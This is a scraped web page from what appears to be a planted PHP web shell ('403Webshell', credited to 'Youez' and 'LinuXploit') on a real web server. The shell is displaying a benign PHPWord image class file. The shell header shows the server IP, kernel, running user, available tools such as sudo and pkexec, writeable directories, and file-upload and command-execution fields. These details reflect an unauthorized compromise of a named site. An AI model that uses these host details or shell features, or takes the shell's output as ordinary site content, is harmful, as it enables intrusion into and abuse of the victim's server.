403Webshell
Server IP : 103.234.187.230  /  Your IP : 216.73.216.216
Web Server : Apache
System : Linux lserver42043-ind.megavelocity.net 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/holidays.tripjack.com/library/PHPWordx/PHPWord/Section/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/holidays.tripjack.com/library/PHPWordx/PHPWord/Section/MemoryImage.php
<?php
/**
 * PHPWord
 *
 * Copyright (c) 2011 PHPWord
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 *
 * @category   PHPWord
 * @package    PHPWord
 * @copyright  Copyright (c) 010 PHPWord
 * @license    http://www.gnu.org/licenses/old-licenses/lgpl-2.1.txt    LGPL
 * @version    Beta 0.6.3, 08.07.2011
 */


/**
 * PHPWord_Section_MemoryImage
 *
 * @category   PHPWord
 * @package    PHPWord_Section
 * @copyright  Copyright (c) 2011 PHPWord
 */
class PHPWord_Section_MemoryImage {
	
	/**
	 * Image Src
	 * 
	 * @var string
	 */
	private $_src;
	
	/**
	 * Image Style
	 * 
	 * @var PHPWord_Style_Image
	 */
	private $_style;
	
	/**
	 * Image Relation ID
	 * 
	 * @var string
	 */
	private $_rId;
	
	/**
	 * Image Type
	 * 
	 * @var string
	 */
	private $_imageType;
	
	/**
	 * Image Create function
	 * 
	 * @var string
	 */
	private $_imageCreateFunc;
	
	/**
	 * Image function
	 * 
	 * @var string
	 */
	private $_imageFunc;
	
	/**
	 * Image function
	 * 
	 * @var string
	 */
	private $_imageExtension;
	
	
	/**
	 * Create a new Image
	 * 
	 * @param string $src
	 * @param mixed style
	 */
	public function __construct($src, $style = null) {
		$imgData = getimagesize($src);
		$this->_imageType = $imgData['mime'];
		
		$_supportedImageTypes = array('image/jpeg', 'image/gif', 'image/png');
		
		if(in_array($this->_imageType, $_supportedImageTypes)) {
			$this->_src = $src;
			$this->_style = new PHPWord_Style_Image();
			
			if(!is_null($style) && is_array($style)) {
				foreach($style as $key => $value) {
					if(substr($key, 0, 1) != '_') {
						$key = '_'.$key;
					}
					$this->_style->setStyleValue($key, $value);
				}
			}
			
			if($this->_style->getWidth() == null && $this->_style->getHeight() == null) {
				$this->_style->setWidth($imgData[0]);
				$this->_style->setHeight($imgData[1]);
			}
			
			$this->_setFunctions();
			
			return $this;
		} else {
			return false;
		}
	}
	
	/**
	 * Set Functions
	 */
	private function _setFunctions() {
		switch($this->_imageType) {
			case 'image/png':
				$this->_imageCreateFunc = 'imagecreatefrompng';
				$this->_imageFunc = 'imagepng';
				$this->_imageExtension = 'png';
				break;
			case 'image/gif':
				$this->_imageCreateFunc = 'imagecreatefromgif';
				$this->_imageFunc = 'imagegif';
				$this->_imageExtension = 'gif';
				break;
			case 'image/jpeg': case 'image/jpg':
				$this->_imageCreateFunc = 'imagecreatefromjpeg';
				$this->_imageFunc = 'imagejpeg';
				$this->_imageExtension = 'jpg';
				break;
		}
	}
	
	
	/**
	 * Get Image style
	 * 
	 * @return PHPWord_Style_Image
	 */
	public function getStyle() {
		return $this->_style;
	}
	
	/**
	 * Get Image Relation ID
	 * 
	 * @return int
	 */
	public function getRelationId() {
		return $this->_rId;
	}
	
	/**
	 * Set Image Relation ID
	 * 
	 * @param int $rId
	 */
	public function setRelationId($rId) {
		$this->_rId = $rId;
	}
	
	/**
	 * Get Image Source
	 * 
	 * @return string
	 */
	public function getSource() {
		return $this->_src;
	}
	
	/**
	 * Get Image Media ID
	 * 
	 * @return string
	 */
	public function getMediaId() {
		return md5($this->_src);
	}
	
	/**
	 * Get Image Type
	 * 
	 * @return string
	 */
	public function getImageType() {
		return $this->_imageType;
	}
	
	/**
	 * Get Image Create Function
	 * 
	 * @return string
	 */
	public function getImageCreateFunction() {
		return $this->_imageCreateFunc;
	}
	
	/**
	 * Get Image Function
	 * 
	 * @return string
	 */
	public function getImageFunction() {
		return $this->_imageFunc;
	}
	
	/**
	 * Get Image Extension
	 * 
	 * @return string
	 */
	public function getImageExtension() {
		return $this->_imageExtension;
	}
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit